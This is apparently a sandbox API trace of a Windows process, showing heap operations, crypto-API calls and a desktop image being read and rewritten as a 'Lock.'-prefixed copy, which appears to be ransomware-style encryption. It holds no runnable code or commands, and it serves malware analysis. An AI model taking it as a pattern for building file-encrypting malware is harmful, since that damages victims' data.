HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0088.016] GetProcAddress (hModule=0x76390000, lpProcName="CryptDestroyHash") returned 0x763af0e0 [0088.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0088.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0088.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0088.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0088.016] CryptDestroyHash (hHash=0x9a3d00) returned 1 [0088.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0088.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0088.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0088.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0088.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0088.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0088.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0088.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0088.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0088.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0088.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0088.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0088.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0088.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0088.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0088.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0088.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0088.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0088.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0088.018] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0088.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0088.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0088.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0088.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0088.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0088.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0088.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0088.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0088.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a697f0 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0088.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0088.021] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0088.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0088.021] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.021] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.021] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0088.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0088.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0088.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0088.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0088.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0088.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0088.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0088.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0088.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0088.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0088.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0088.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2aae878 [0088.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0088.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0088.022] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/9gEE-.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\9gee-.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0088.022] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.022] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0088.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7040 [0088.022] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.022] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.022] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.022] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0088.022] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.9gEE-.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.9gee-.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0088.023] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.023] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.023] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.023] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.025] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0088.025] ReadFile (in: hFile=0x2c4, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0xcdc4, lpOverlapped=0x0) returned 1 [0088.074] ReadFile (in: hFile=0x2c4, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0088.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0088.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0088.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0088.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0088.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcdc4) returned 0x2a7a130 [0088.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x39c2020 | out: hHeap=0x2af0000) returned 1 [0088.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0088.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0088.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0088.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0088.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0088.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0088.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0088.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcdc4) returned 0x2a86f00 [0088.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0088.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0088.079] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0088.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0088.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0088.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0088.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcdc4) returned 0x2a7a130 [0088.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0088.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0088.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0088.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0088.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0088.079] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0088.079] RtlAllocateHeap 